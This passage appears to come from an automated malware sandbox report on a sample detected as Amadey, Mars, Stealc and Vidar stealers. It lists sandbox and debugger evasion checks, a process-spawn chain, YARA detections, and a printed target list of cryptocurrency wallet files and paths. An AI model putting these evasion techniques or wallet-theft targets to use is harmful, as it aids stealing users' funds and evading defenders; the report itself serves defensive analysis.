Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: EHDHDHIECG.exe, 00000006.00000003.2246638604.00000000013CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AKFHDBFI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: explorti.exe, 0000000D.00000002.3230163969.000000000125C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Code function: 6_2_05320823 rdtsc 6_2_05320823
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C375FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C375FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004D643B mov eax, dword ptr fs:[00000030h] 13_2_004D643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004DA1A2 mov eax, dword ptr fs:[00000030h] 13_2_004DA1A2
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C34B66C
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C34B1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe" Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe" Jump to behavior
Source: EHDHDHIECG.exe, EHDHDHIECG.exe, 00000006.00000002.2284909895.00000000008D4000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: 2@~Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B341 cpuid 0_2_6C34B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3135A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C3135A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1DE0 GetUserNameA, 14_2_7EAE1DE0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 10.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.EHDHDHIECG.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.2697614197.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2284848732.00000000006D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2194479080.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2326220541.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2316173620.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2285765629.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3228822422.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2275708429.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a3b2c9311b.exe PID: 3448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 